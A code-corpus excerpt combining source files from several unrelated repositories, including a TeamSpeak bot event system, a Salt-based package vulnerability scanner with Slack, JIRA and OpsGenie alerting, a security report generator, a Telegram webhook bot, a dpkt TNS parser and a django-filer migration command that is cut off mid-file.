#### File: tsbot/extensions/events.py
```python
from __future__ import annotations
import asyncio
import logging
from collections import defaultdict
from typing import TYPE_CHECKING, Any, Callable, Coroutine, TypeAlias
from tsbot import utils
from tsbot.extensions import extension
if TYPE_CHECKING:
from tsbot.bot import TSBot
from tsbot.plugin import TSPlugin
logger = logging.getLogger(__name__)
class TSEvent:
__slots__ = "event", "msg", "ctx"
def __init__(self, event: str, msg: str | None = None, ctx: dict[str, str] | None = None) -> None:
self.event = event
self.msg = msg
self.ctx: dict[str, str] = ctx or {}
def __repr__(self) -> str:
return f"{self.__class__.__qualname__}(event={self.event!r}, msg={self.msg!r}, ctx={self.ctx!r})"
@classmethod
def from_server_response(cls, raw_data: str):
event, data = raw_data.split(" ", maxsplit=1)
return cls(event=event.removeprefix("notify"), msg=None, ctx=utils.parse_line(data))
T_EventHandler: TypeAlias = Callable[..., Coroutine[TSEvent, None, None]]
class TSEventHandler:
__slots__ = "event", "handler", "plugin_instance"
def __init__(self, event: str, handler: T_EventHandler, plugin_instance: TSPlugin | None = None) -> None:
self.event = event
self.handler = handler
self.plugin_instance = plugin_instance
def __repr__(self) -> str:
return (
f"{self.__class__.__qualname__}(event={self.event!r}, "
f"handler={self.handler.__qualname__!r}, "
f"plugin={None if not self.plugin_instance else self.plugin_instance.__class__.__qualname__!r}"
")"
)
async def run(self, bot: TSBot, event: TSEvent) -> None:
event_args = (bot, event)
if self.plugin_instance:
event_args = (self.plugin_instance, *event_args)
await self.handler(*event_args)
def __call__(self, *args: Any, **kwargs: Any):
return self.run(*args, **kwargs)
class EventHanlder(extension.Extension):
def __init__(self, parent: TSBot) -> None:
super().__init__(parent)
self.event_handlers: defaultdict[str, list[TSEventHandler]] = defaultdict(list)
self.event_queue: asyncio.Queue[TSEvent] = asyncio.Queue()
def _handle_event(self, event: TSEvent, timeout: float | None = None):
event_handlers = self.event_handlers.get(event.event, [])
for event_handler in event_handlers:
asyncio.create_task(asyncio.wait_for(event_handler.run(self.parent, event), timeout=timeout))
async def _handle_events_task(self) -> None:
"""
Task to run events put into the self._event_queue
if task is cancelled, it will try to run all the events
still in the queue with a timeout
"""
try:
while True:
event = await self.event_queue.get()
logger.debug("Got event: %s", event)
self._handle_event(event)
self.event_queue.task_done()
except asyncio.CancelledError:
while not self.event_queue.empty():
event = await self.event_queue.get()
self._handle_event(event, timeout=1.0)
self.event_queue.task_done()
def register_event_handler(self, event_handler: TSEventHandler) -> None:
"""Registers event handlers that will be called when given event happens"""
self.event_handlers[event_handler.event].append(event_handler)
logger.debug(f"Registered {event_handler.event!r} event to execute {event_handler.handler.__qualname__!r}")
async def run(self):
self.parent.register_background_task(self._handle_events_task, name="HandleEvent-Task")
```
#### File: tsbot/extensions/extension.py
```python
from __future__ import annotations
from typing import TYPE_CHECKING
if TYPE_CHECKING:
from tsbot.bot import TSBot
class Extension:
def __init__(self, parent: TSBot) -> None:
self.parent = parent
async def run(self):
...
``` |
{
"source": "0x4C4A/SS-2014",
"score": 2
} |
#### File: SS-2014/LD3/ld3_script.py
```python
import sys
import numpy as np
import matplotlib.pyplot as plt
from PyQt4 import QtGui, QtCore
from scipy.fftpack import fft
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar
class Window(QtGui.QDialog):
def __init__(self, parent=None):
super(Window, self).__init__(parent)
# a figure instance to plot on
self.figure = plt.figure()
self.setWindowTitle('Singnala spektra atkariba no taisnstura loga platuma')
# this is the Canvas Widget that displays the `figure`
# it takes the `figure` instance as a parameter to __init__
self.canvas = FigureCanvas(self.figure)
# this is the Navigation widget
# it takes the Canvas widget and a parent
self.toolbar = NavigationToolbar(self.canvas, self)
# Make a slidebar
sld = QtGui.QSlider(QtCore.Qt.Horizontal, self)
sld.setFocusPolicy(QtCore.Qt.StrongFocus)
sld.setGeometry(30, 40, 200, 30)
sld.setMaximum(40)
sld.setMinimum(1)
sld.setTickInterval(1)
sld.setTickPosition(2)
sld.setValue(20)
sld.valueChanged[int].connect(self.changeValue)
# Make a Line Edit widget
self.qle = QtGui.QLineEdit(self)
self.qle.setReadOnly(1)
#self.qle.insert('Taisnstura loga platums:')
# set the layout
layout = QtGui.QVBoxLayout()
layout.addWidget(self.toolbar)
layout.addWidget(self.canvas)
layout.addWidget(sld)
layout.addWidget(self.qle)
self.setLayout(layout)
def changeValue(self, value):
''' plot '''
        # Time parameters
T = value/10.
sampRate = samples/T
x = np.linspace(0, T, samples)
        # Windowed signal
y = np.sin(2*np.pi*x)+np.sin(2*np.pi*x*1.5)
        # Discrete spectrum
S = fft(y)/samples
fs = np.arange(0, sampRate, 1/T)
        # Continuous spectrum
fx0 = np.arange(-2, 10, 0.001)
S0 = 0.5*np.sinc(T*fx0)
# plot
sign = self.figure.add_subplot(211)
spectr = self.figure.add_subplot(212)
        # Clear the previous plots
sign.hold(False)
spectr.hold(False)
        # Draw the new ones
sign.plot(x, y, '.-k')
sign.legend(['Ierobezots signals'], 1)
spectr.stem(fs, abs(S), linefmt='k', markerfmt='.k'), spectr.hold(True)
spectr.plot(fx0+1, abs(S0), '-.b')
spectr.legend(['Signala spektrs'], 1)
spectr.axis([0., 5., 0, 0.8])#, sign.axis([0, 4., -1, 1])
spectr.grid(b = True, which='both', linewidth=2), sign.grid(b = True)
        # Update the Line Edit widget with the window width
t = 'Taisnstura loga platums: {}xT'.format(T)
self.qle.setSelection(0, len(t))
self.qle.insert(t)
        # Refresh the canvas
self.canvas.draw()
if __name__ == '__main__':
app = QtGui.QApplication(sys.argv)
    # Simulation time parameters
samples = 128
# GUI
main = Window()
main.changeValue(20)
main.show()
sys.exit(app.exec_())
``` |
{
"source": "0x4D31/salt-scanner",
"score": 2
} |
#### File: 0x4D31/salt-scanner/salt-scanner.py
```python
from collections import defaultdict
from slackclient import SlackClient
from opsgenie.swagger_client import AlertApi
from opsgenie.swagger_client import configuration
from opsgenie.swagger_client.rest import ApiException
from opsgenie.swagger_client.models import *
from jira import JIRA
import json
import os
import time
import salt.client
import uuid
import sys
import re
import argparse
import tempfile
try:
import urllib.request as urllib2
except ImportError:
import urllib2
__author__ = 'Adel "<PASSWORD>" Ka'
__version__ = '0.1'
#############################[ configuration ]#############################
# OS name in lowercase (e.g. "centos")
# OS version (e.g. "7")
# Set the both values to None for automatic OS and version detection
default_os_name = None
default_os_ver = None
# Bash glob (e.g. "prod-db*") or python list of hosts (e.g. "host1,host2")
target_hosts = "*"
# Slack Alert
slack_alert = False
# Set your Slack API Token here.
# Alternatively, you can use the environment variable SLACK_API_TOKEN
slack_api_token = "<PASSWORD>"
# Use "#something" for public channels or "something" for private channels
slack_channel = "#vulners"
# Minimum CVSS score for creating a JIRA issue or OpsGenie alert
alert_score = 7
# JIRA Alert
# creates an issue per scan (not per vulnerable host)
jira_alert = False
jira_server = "https://yourcompany.atlassian.net"
jira_user = "user"
jira_pass = "<PASSWORD>"
issue_type = "Task"
issue_projectKey = "VM"
issue_summary = "New issue from Salt-Scanner"
issue_priority = "Critical"
# OpsGenie Alert
# creates an alert per scan (not per vulnerable host)
opsgenie_alert = False
opsgenie_api_key = "d94de12d-4ds1-4d40-b211-EXAMPLE"
opsgenie_taglist = ['security', 'devops', 'vuln']
opsgenie_entity = "Prod-servers"
opsgenie_message = "New alert from Salt-Scanner"
# Priority of the alert. Should be one of P1, P2, P3 (default), P4, or P5:
# P1-Critical, P2-High, P3-Moderate, P4-Low, P5-Informational
opsgenie_priority = "P1"
###########################################################################
VULNERS_LINKS = {'pkgChecker': 'https://vulners.com/api/v3/audit/audit/',
'bulletin': 'https://vulners.com/api/v3/search/id/?id=%s'}
ASCII = r"""
==========================================================
Vulnerability scanner based on Vulners API and Salt Open
_____ _ _ _____
/ ___| | | | / ___|
\ `--. __ _| | |_ \ `--. ___ __ _ _ __ _ __ ___ _ __
`--. \/ _` | | __| `--. \/ __/ _` | '_ \| '_ \ / _ \ '__|
/\__/ / (_| | | |_ /\__/ / (_| (_| | | | | | | | __/ |
\____/ \__,_|_|\__| \____/ \___\__,_|_| |_|_| |_|\___|_|
Salt-Scanner 0.1 / by 0x4D31
==========================================================
"""
hcount = vhcount = id = 0
def get_os(hosts, form):
client = salt.client.LocalClient()
result = client.cmd(
hosts, 'cmd.run',
['cat /etc/os-release'],
expr_form=form
)
if result:
hostsDict = defaultdict(dict)
osDict = defaultdict(list)
for key, value in result.iteritems():
for line in value.split('\n'):
if "=" in line:
k, v = line.rstrip().split("=")
if k == "ID":
hostsDict[key][k] = v.strip('"')
if k == "VERSION_ID":
hostsDict[key][k] = v.strip('"')
if hostsDict[key]["ID"] == "amzn":
hostsDict[key]["ID"] = "amazon linux"
for host, info in hostsDict.iteritems():
keyname = "%s-%s" % (info["ID"], info["VERSION_ID"])
osDict[keyname].append(host)
return osDict
def get_packages(osName, hosts, form):
client = salt.client.LocalClient()
if osName in ('debian', 'ubuntu', 'kali'):
cmd = "dpkg-query -W -f='${Package} ${Version} ${Architecture}\n'"
elif osName in ('rhel', 'centos', 'oraclelinux', 'suse',
'fedora', 'amazon linux', 'amazon'):
cmd = "rpm -qa"
else:
cmd = None
return client.cmd(
hosts,
'cmd.run',
[cmd],
expr_form=form
) if cmd else None
def get_kernel(host, osName):
client = salt.client.LocalClient()
res = client.cmd(
host,
'cmd.run',
["uname -r"]
)
if osName in ('rhel', 'centos', 'oraclelinux', 'suse',
'fedora', 'amazon linux', 'amazon'):
return "kernel-{}".format(res[host])
elif osName in ('debian', 'ubuntu', 'kali'):
return "linux-image-{}".format(res[host])
def sendVulnRequest(url, payload):
req = urllib2.Request(url)
req.add_header('Content-Type', 'application/json')
req.add_header('User-Agent', 'salt-scanner')
response = urllib2.urlopen(req, json.dumps(payload).encode('utf-8'))
responseData = response.read()
if isinstance(responseData, bytes):
responseData = responseData.decode('utf8')
responseData = json.loads(responseData)
return responseData
def audit(packagesDict, osName, osVer, tgt_hosts):
global hcount, vhcount
# vhosts contains the list of vulnerable hosts by severity
# {'SEVERITY': [list of hosts]}
vhosts = defaultdict(list)
# vdict contains the list of vulnerable hosts, overall CVSS score & vector,
# and vulnerable packages. Will use this for creating JIRA issues and etc.
# {'HOST': {'cvss_score':'SCORE', 'cvss_vector':'VECTOR',
# 'vuln_pkgs': 'list of vulnerable packages'}}
vdict = defaultdict(dict)
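    # e.g. (hypothetical hosts and values):
    #   vhosts = {'Critical': ['web-01'], 'Medium': ['db-02']}
    #   vdict = {'web-01': {'cvss_score': 9.8, 'cvss_vector': 'AV:N/AC:L/...',
    #                       'vuln_pkgs': 'bash,openssl'}}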
now = time.strftime('%a, %d %b %Y %H:%M:%S %Z', time.localtime())
starttext = ("{:=^36}\nScan started at {}\n{:=^36}\n:ghost: Scan Results:"
).format("", now, "")
if slack_alert:
slack_alerter(None, starttext)
filename = ("{}_{}.txt").format(
time.strftime("%Y%m%d-%H%M%S", time.localtime()), str(uuid.uuid4())
)
file = os.path.join(tempfile.gettempdir(), filename)
with open(file, 'w') as f:
f.write("{}\n".format(starttext))
for key, value in packagesDict.iteritems():
hcount += 1
init_pkgs = value.splitlines()
# remove kernel packages from the list
r = re.compile('kernel-[0-9]')
r2 = re.compile('linux-image-[0-9]')
        # use a real list (not a lazy filter object) so the kernel package can be appended below
        pkgs = [i for i in init_pkgs if not (r.match(i) or r2.match(i))]
# add kernel package to the list, based on uname:
kernelpkg = get_kernel(key, osName)
if kernelpkg:
pkgs.append(kernelpkg)
print("+ Started Scanning '{}'...".format(key))
print(" - Total Packages: {}".format(len(pkgs)))
payload = {'os': osName,
'version': osVer,
'package': pkgs}
url = VULNERS_LINKS.get('pkgChecker')
response = sendVulnRequest(url, payload)
resultCode = response.get("result")
if resultCode == "OK":
# if response.get('data').get('cvss').get('score') != 0:
vulnsFound = response.get('data').get('vulnerabilities')
if not vulnsFound:
print(" - No vulnerabilities found.")
with open(file, 'a') as f:
f.write("\n\n+ Host: {}\n No vulnerabilities found.\n"
.format(key))
if slack_alert:
slack_alerter(key, "ok")
else:
vhcount += 1
if slack_alert:
slack_alerter(key, response)
cvss_vector = response.get('data').get('cvss').get('vector')
cvss_score = response.get('data').get('cvss').get('score')
vuln_pkgs = ",".join(response.get('data').get('packages'))
if ((jira_alert or opsgenie_alert) and
cvss_score >= alert_score):
vdict[key]['cvss_score'] = cvss_score
vdict[key]['cvss_vector'] = cvss_vector
vdict[key]['vuln_pkgs'] = vuln_pkgs
if cvss_score >= 7:
severity = "Critical" if cvss_score >= 9 else "High"
elif 4 <= cvss_score < 7:
severity = "Medium"
else:
severity = "Low"
vpcount = 0
for vp in response.get('data').get('packages'):
vpcount += 1
print(" - {} Vulnerable Packages Found - Severity: {}"
.format(vpcount, severity))
vhosts[severity].append(key)
with open(file, 'a') as f:
f.write("\n\n+ Host: {}\n CVSS Score: {} Severity: {}\n\n Vulnerable packages:\n"
.format(key, cvss_score, severity))
payload = {'id': vulnsFound}
allVulnsInfo = sendVulnRequest(
VULNERS_LINKS['bulletin'], payload)
vulnInfoFound = allVulnsInfo['result'] == 'OK'
for package in response['data']['packages']:
with open(file, 'a') as f:
f.write(" {}\n".format(package))
packageVulns = []
for vulns in response['data']['packages'][package]:
if vulnInfoFound:
vulnInfo = ("{id} - '{title}', CVSS Score: {score}"
.format(id=vulns,
title=allVulnsInfo['data']['documents'][vulns]['title'],
score=allVulnsInfo['data']['documents'][vulns]['cvss']['score']))
                            # collect (description, score) tuples; only the
                            # description is written out below
                            packageVulns.append((
                                vulnInfo,
                                allVulnsInfo['data']['documents'][vulns]['cvss']['score']))
else:
packageVulns.append((vulns, 0))
packageVulns = [" "*10 + x[0] for x in packageVulns]
with open(file, 'a') as f:
f.write("\n".join(packageVulns) + "\n")
else:
print("Error - %s" % response.get('data').get('error'))
    correct_words = "Hosts are" if vhcount != 1 else "Host is"
endtext = ("Finished scanning {} hosts (target hosts: '{}').\n{} {} vulnerable!"
.format(hcount, tgt_hosts, vhcount, correct_words))
print("\n+ {}\n".format(endtext))
with open(file, 'a') as f:
f.write("\n\n{}".format(endtext))
print("+ Output file created: {}".format(file))
if slack_alert:
slack_alerter(None, endtext)
if vhosts:
slack_alerter(None, vhosts)
slack_fileUpload(filename, file)
if jira_alert and vdict:
jira_alerter(vdict)
if opsgenie_alert and vdict:
opsgenie_alerter(vdict)
def slack_tokenCheck():
try:
slack_api_token
except NameError:
if "SLACK_API_TOKEN" in os.environ:
return
else:
print("Error: Missing Slack API Token")
sys.exit(1)
def slack_fileUpload(filename, file):
global slack_api_token
try:
slack_api_token
except NameError:
slack_api_token = os.environ["SLACK_API_TOKEN"]
sc = SlackClient(slack_api_token)
response = sc.api_call(
'files.upload',
channels=slack_channel,
filename=filename,
file=open(file, 'rb'),
title="Full scan results")
if not response['ok']:
print("Slack Error: {}".format(response['error']))
else:
print("+ Full report uploaded to Slack")
def slack_alerter(host, rd):
global id, slack_api_token
try:
slack_api_token
except NameError:
slack_api_token = os.environ["SLACK_API_TOKEN"]
sc = SlackClient(slack_api_token)
if host is not None:
if rd == "ok":
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=("Host _%s_ is not vulnerable." % host),
thread_ts=id
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
else:
vpcount = 0
for vp in rd.get('data').get('packages'):
vpcount += 1
vulnpacks = "\n".join(rd.get('data').get('packages'))
cvss = rd.get('data').get('cvss').get('score')
if cvss >= 7:
color = "danger"
severity = "Critical" if cvss >= 9 else "High"
elif 4 <= cvss < 7:
color = "warning"
severity = "Medium"
else:
color = "good"
severity = "Low"
att = [{
"fallback": "scan results",
"color": color,
"pretext": ("%d vulnerable packages detected!" % vpcount),
"title": "Hostname: ",
"text": host,
"fields": [
{
"title": "CVSS Score",
"value": cvss,
"short": "true"
},
{
"title": "Severity",
"value": severity,
"short": "true"
},
{
"title": "Vulnerable Packages",
"value": vulnpacks
}
],
"footer": "Vulners",
"footer_icon": "https://pbs.twimg.com/profile_images/711948370332545025/0A-995CX.jpg",
"ts": id
}]
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=("Host _%s_ is vulnerable :scream:" % host),
attachments=json.dumps(att),
thread_ts=id
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
else:
        if isinstance(rd, str):
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=(rd)
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
sys.exit(1)
else:
id = response['ts']
else:
for sev, hosts in rd.iteritems():
vulnhosts = "\n".join(hosts)
if sev in ("Critical", "High"):
color = "danger"
elif sev == "Medium":
color = "warning"
else:
color = "good"
att = [{
"fallback": "scan results - summary",
"color": color,
"title": "Severity",
"text": sev,
"fields": [
{
"title": "Hosts",
"value": vulnhosts
}
],
"footer": "Vulners",
"footer_icon": "https://pbs.twimg.com/profile_images/711948370332545025/0A-995CX.jpg",
"ts": id
}]
response = sc.api_call(
"chat.postMessage",
channel=slack_channel,
text=("Summary Report:"),
attachments=json.dumps(att),
thread_ts=id
)
if not response['ok']:
print("Slack Error: {}".format(response['error']))
def jira_alerter(result):
jira_options = {'server': jira_server}
jira = JIRA(options=jira_options, basic_auth=(jira_user, jira_pass))
issue_description = "List of the vulnerable hosts: \n"
for host, value in result.iteritems():
issue_description += ("[+] {}\n CVSS Score: {}\n CVSS Vector: {}\n Packages: {}\n"
.format(host,
value['cvss_score'],
value['cvss_vector'],
value['vuln_pkgs']))
issue_dict = {
'project': {'key': issue_projectKey},
'summary': issue_summary,
'description': issue_description,
'issuetype': {'name': issue_type},
'priority': {'name': issue_priority}
}
new_issue = jira.create_issue(fields=issue_dict)
print("+ JIRA issue created: {}".format(new_issue))
def opsgenie_alerter(result):
configuration.api_key['Authorization'] = opsgenie_api_key
configuration.api_key_prefix['Authorization'] = 'GenieKey'
issue_description = "List of the vulnerable hosts: \n"
for host, value in result.iteritems():
issue_description += ("[+] {}\n CVSS Score: {}\n CVSS Vector: {}\n Packages: {}\n"
.format(host,
value['cvss_score'],
value['cvss_vector'],
value['vuln_pkgs']))
body = CreateAlertRequest(
message=opsgenie_message,
description=issue_description,
tags=opsgenie_taglist,
entity=opsgenie_entity,
priority=opsgenie_priority,
source='Salt-Scanner',
# teams=[TeamRecipient(name='ops_team')],
# visible_to=[TeamRecipient(name='ops_team', type='team')],
note='Alert created')
try:
AlertApi().create_alert(body=body)
print("+ OpsGenie alert created")
except ApiException as err:
print("OpsGenie - Exception when calling AlertApi->create_alert: %s"
% err)
def parse_cmd_line_args():
parser = argparse.ArgumentParser()
parser.add_argument(
'-t', '--target-hosts',
type=str,
default=target_hosts
# help='Bash glob (e.g."prod-db*") or \
# python list of hosts (e.g."host1,host2")'
)
parser.add_argument(
'-tF', '--target-form',
type=str,
default='glob',
choices=["glob", "list", "grain"]
# help='Bash glob (e.g."prod-db*") or \
# python list of hosts (e.g."host1,host2"), or \
# Salt grains (e.g. "os:amazon" or "ec2_tags:role:webapp")'
)
parser.add_argument(
'-oN', '--os-name',
type=str,
default=default_os_name
# help='Default OS name'
)
parser.add_argument(
'-oV', '--os-version',
type=str,
default=default_os_ver
# help='Default OS version'
)
return parser.parse_args()
def main():
args = parse_cmd_line_args()
if slack_alert:
slack_tokenCheck()
# If default OS and Version is set
if all([args.os_name, args.os_version]):
print("+ Default OS: {}, Version: {}".format(
args.os_name, args.os_version
))
print("+ Getting the Installed Packages...")
pdict = get_packages(
args.os_name,
args.target_hosts,
args.target_form
)
if pdict:
audit(
pdict,
args.os_name,
args.os_version,
args.target_hosts
)
else:
print("Error: package list is empty")
    # No default OS and version is set; detecting the OS automatically
else:
print("+ No default OS is configured. Detecting OS...")
os_dict = get_os(
args.target_hosts,
args.target_form
)
if os_dict:
print("+ Detected Operating Systems:")
for os_nameVer, hlist in os_dict.iteritems():
os_info = os_nameVer.split('-')
print(" - OS Name: {}, OS Version: {}".format(
os_info[0],
os_info[1]))
print("+ Getting the Installed Packages...")
hosts = ','.join(hlist)
pdict = get_packages(
os_info[0],
hosts,
"list"
)
if pdict:
audit(
pdict,
os_info[0],
os_info[1],
args.target_hosts
)
else:
print("Error: package list is empty")
if __name__ == '__main__':
print(ASCII)
main()
``` |
{
"source": "0x4d-sh/security-report-generator-excel-to-docx",
"score": 3
} |
#### File: security-report-generator-excel-to-docx/core/utils.py
```python
import re
import math
import pandas as pd
from operator import itemgetter
from docxtpl import DocxTemplate
# Import issue library
def read_excel(file, sheet_name=0, header=0, type="record"):
    df = pd.read_excel(file, sheet_name=sheet_name, header=header, engine='openpyxl')
if type == "list":
return df.set_index("Issue Title").T.to_dict()
else:
return df.to_dict(orient='records')
def find_matching_key(lists, keyword):
for comp in lists:
if comp in keyword:
return comp
return None
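# Example (hypothetical values): with lists = ['api', 'web'] and
# keyword = 'web-assessment.xlsx', this returns 'web'; it returns None when
# no component name is a substring of the keyword.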
def generate_report(template, content, output):
document = DocxTemplate(template)
document.render(content)
document.save(output)
def unflatten(file, library, configuration):
tmp = {}
unique = []
content = read_excel(file, sheet_name=0, header=0)
definition = read_excel(library, header=0, type="list")
# Create list of dict with array
for item in content:
tmp[item['Issue Title']] = {}
tmp[item['Issue Title']]['affected'] = []
count = 0
for item in content:
tmpk = {}
for k, v in item.items():
if k in configuration:
tmpk[clean_string(k)] = v
if k not in configuration:
if k == "Issue Title":
                    # pandas reads empty cells as NaN (a float), so a float
                    # here means "no replacement title in the library"
                    if isinstance(definition[item['Issue Title']]['New Title'], float):
tmp[item['Issue Title']][clean_string(k)] = item['Issue Title']
else:
tmp[item['Issue Title']][clean_string(k)] = definition[item['Issue Title']]['New Title']
else:
if isinstance(definition[item['Issue Title']][k], float):
tmp[item['Issue Title']][clean_string(k)] = ""
else:
tmp[item['Issue Title']][clean_string(k)] = definition[item['Issue Title']][k]
if "\"" in item['Affected File(s)']:
sheet_name = re.findall(r'"([^"]*)"', item['Affected File(s)'])
tmp[item['Issue Title']]['affected'] = retrieve_list(file, sheet_name, configuration)
else:
tmp[item['Issue Title']]['affected'].append(tmpk)
count = count + len(tmp[item['Issue Title']]['affected'])
for k, v in tmp.items():
unique.append(v)
# For debugging
# for i in unique:
# i = {k: str(v).encode("utf-8") for k,v in i.items()}
# print("{comp}:{x}".format(comp=i['issuetitle'],x=i['affected']))
print("[+] Added {count} records".format(count=count))
return unique
def retrieve_list(file, sheet_name, configuration):
list_of_items = []
sheet = read_excel(file, sheet_name=sheet_name[0], header=1)
for item in sheet:
tmp = {}
for k, v in item.items():
if k in configuration:
tmp[clean_string(k)] = v
list_of_items.append(tmp)
return list_of_items
def retrieve_definition(file, issue):
return issue
def print_list(content, key):
for item in content:
print(item[key])
def clean_string(word):
setting = str.maketrans({'(':None, ')':None, ' ':None})
return word.lower().translate(setting)
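# Example: clean_string("Affected File(s)") -> "affectedfiles"
# (lowercases and strips parentheses/spaces so keys match template variables).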
def sort_by_risk(content, definition):
# Sort definition by priority
order = sorted(definition, key=lambda x: definition[x]['priority'], reverse=True)
risk = {key: definition.get(key) for key in order}
tmp = content
for item in risk:
tmp = sorted(tmp, key=lambda x: risk[item]['order'].index(x[item]))
for item in tmp:
if item['risk'] == "Critical": item['background'] = '5f497a'
if item['risk'] == "High": item['background'] = 'c00000'
if item['risk'] == "Medium": item['background'] = 'e36c0a'
if item['risk'] == "Low": item['background'] = '339900'
if item['risk'] == "Informational": item['background'] = '0070c0'
return tmp
```
#### File: 0x4d-sh/security-report-generator-excel-to-docx/main.py
```python
import re
import os
import json
from docxtpl import DocxTemplate, RichText
from core import utils
def main():
with open('config.json') as f:
config = json.load(f)
document = DocxTemplate(config['template'])
# Initialize variables
assessment = {}
components = []
# Import assessment result from directory
for file_name in os.listdir(config['assessment']):
file_path = '{base}/{file}'.format(base=config['assessment'], file=file_name)
library_path = config['library']
if (component := utils.find_matching_key(config['components'], file_name)) is not None:
tmpd = {}
tmpd['name'] = config['components'][component]
tmpd['shortname'] = component
print("[*] Creating assessment,", tmpd['shortname'])
tmpd['findings'] = utils.sort_by_risk(utils.unflatten(file_path, library_path, config['group']), config['risk_matrix'])
components.append(tmpd)
assessment['components'] = components
assessment['report_config'] = config['report_configuration']
# For debugging
# print(assessment, file=open("debug.json", "w", encoding='utf-8'))
utils.generate_report(config['template'], assessment, config['report_name'])
print("[*] Report has been generated:", config['report_name'])
if __name__ == '__main__':
main()
``` |
{
"source": "0x4d-sh/telegram-bot-webhook-flask",
"score": 3
} |
#### File: 0x4d-sh/telegram-bot-webhook-flask/bot.py
```python
from flask import Flask, request
import requests
import telegram
# Config
TOKEN = "<number>:<alphanumeric>"
TELEGRAM_URL = "https://api.telegram.org/bot{token}".format(token=TOKEN)
WEBHOOK_URL = "https://<url>"
# To retrieve unique user chat ID and group ID, use @IDBot
WHITELISTED_USERS = []
bot = telegram.Bot(token=TOKEN)
# Bot
app = Flask(__name__)
def sendmessage(chat_id):
    # As the bot is searchable and visible to the public,
    # limit its responses to whitelisted chat IDs only.
    authorised = chat_id in WHITELISTED_USERS
message = "<Notification>"
if not authorised:
message = "You're not authorised."
url = "{telegram_url}/sendMessage".format(telegram_url=TELEGRAM_URL)
payload = {
"text": message,
"chat_id": chat_id
}
resp = requests.get(url,params=payload)
@app.route("/", methods=["POST","GET"])
def index():
if(request.method == "POST"):
response = request.get_json()
# To Debug
# print(response)
        # Run only if 'message' exists in the response.
if 'message' in response:
            # Do not respond to other bots in the same group chat.
if 'entities' not in response['message']:
chat_id = response["message"]["chat"]["id"]
sendmessage(chat_id)
return "Success"
@app.route("/setwebhook/")
def setwebhook():
s = requests.get("{telegram_url}/setWebhook?url={webhook_url}".format(telegram_url=TELEGRAM_URL,webhook_url=WEBHOOK_URL))
if s:
return "Success"
else:
return "Fail"
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "0x4e38/dpkt",
"score": 2
} |
#### File: dpkt/dpkt/tns.py
```python
import dpkt
class TNS(dpkt.Packet):
__hdr__ = (
('length', 'H', 0),
('pktsum', 'H', 0),
('type', 'B', 0),
('rsvd', 'B', 0),
('hdrsum', 'H', 0),
('msg', '0s', ''),
)
def unpack(self, buf):
dpkt.Packet.unpack(self, buf)
n = self.length - self.__hdr_len__
if n > len(self.data):
raise dpkt.NeedData('short message (missing %d bytes)' %
(n - len(self.data)))
self.msg = self.data[:n]
self.data = self.data[n:]
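# Minimal usage sketch (assumes `buf` holds a raw TNS record, e.g. captured
# from TCP port 1521):
#   tns = TNS(buf)
#   print(tns.type, len(tns.msg))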
``` |
{
"source": "0x4e3/aperitive",
"score": 3
} |
#### File: aperitive/console/commander.py
```python
from __future__ import unicode_literals
import os
from aperitive.console.utils import find_commands, load_command_class
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
class Commander(object):
def __init__(self, cli):
self.cli = cli
def _load_commands(self):
command_dir = os.path.join(BASE_DIR, 'console')
command_names = find_commands(command_dir)
commands = list(map(
lambda cmd: load_command_class('aperitive', cmd),
command_names))
for command in commands:
self.cli.add_command(command)
def add_commands(self):
self._load_commands()
```
#### File: console/utils/importer.py
```python
from __future__ import unicode_literals
import six
import sys
from importlib import import_module
def import_string(dotted_path):
"""
Import a dotted module path and return the attribute/class designated
by the last name in the path. Raise ImportError if the import failed.
"""
try:
module_path, class_name = dotted_path.rsplit('.', 1)
except ValueError:
msg = "%s doesn't look like a module path" % dotted_path
six.reraise(ImportError, ImportError(msg), sys.exc_info()[2])
mod = import_module(module_path)
try:
return getattr(mod, class_name)
except AttributeError:
msg = 'Module "{}" does not define a "{}" attribute/class'.\
format(module_path, class_name)
six.reraise(ImportError, ImportError(msg), sys.exc_info()[2])
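# Example: import_string('importlib.import_module') returns the
# import_module function; a bad path raises ImportError rather than
# ValueError/AttributeError.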
def load_command_class(app_name, name):
"""
Return command instance by given application name and command name.
"""
return import_string(
'{0}.console.commands.{1}.{1}'.format(app_name, name))
```
#### File: aperitive/tests/test_aperitive.py
```python
import os
import yaml
from click.testing import CliRunner
from aperitive import console
def test_command_line_interface():
"""Test the CLI."""
runner = CliRunner()
result = runner.invoke(console.cli)
assert result.exit_code == 0
assert 'Usage: ' in result.output
help_result = runner.invoke(console.cli, ['--help'])
assert help_result.exit_code == 0
assert '--help Show this message and exit.' in help_result.output
def test_init():
runner = CliRunner()
command_input = 'gitlab.com\napiuser\npwd\npwd' \
'\nredmine.com\napiuser\npwd\npwd'
# Test 'init' command in the isolated filesystem and
# custom config directory.
with runner.isolated_filesystem():
config_dir = './config'
config_file = os.path.join(config_dir, '.aperitive.yml')
result = runner.invoke(
console.cli,
['init', config_dir],
input=command_input + '\ny')
assert not result.exception
assert os.path.exists(config_dir) and os.path.isdir(config_dir)
assert os.path.exists(config_file) and os.path.isfile(config_file)
with open(config_file) as f:
            config = yaml.safe_load(f)
assert config['gitlab.server'] == 'gitlab.com'
assert config['redmine.server'] == 'redmine.com'
``` |
{
"source": "0x4e3/filertools",
"score": 2
} |
#### File: management/commands/old_files_migration.py
```python
from __future__ import unicode_literals, absolute_import
from django.contrib.contenttypes.models import ContentType
from django.core.management import call_command
from django.core.management.base import BaseCommand
from filer.models import File
from filertools.filertools.models import OrderedFile
class Command(BaseCommand):
help = 'Creates OrderFiles from Files'
def handle(self, *args, **options):
created_files_count = 0
folders_for_rebuild = set()
ordered_file_content_type = \
ContentType.objects.get_for_model(OrderedFile)
for filer_file in File.objects.all():
try:
filer_file.orderedfile
except OrderedFile.DoesNotExist:
ordered_file = OrderedFile(file_ptr_id=filer_file.id)
ordered_file.__dict__.update(filer_file.__dict__)
ordered_file.polymorphic_ctype = ordered_file_content_type
ordered_file.order = 1
ordered_file.save()
created_files_count += 1
else:
# already has ordered file
continue
if created_files_count:
self.stdout.write(
self.style.SUCCESS(
'Successfully created {} '
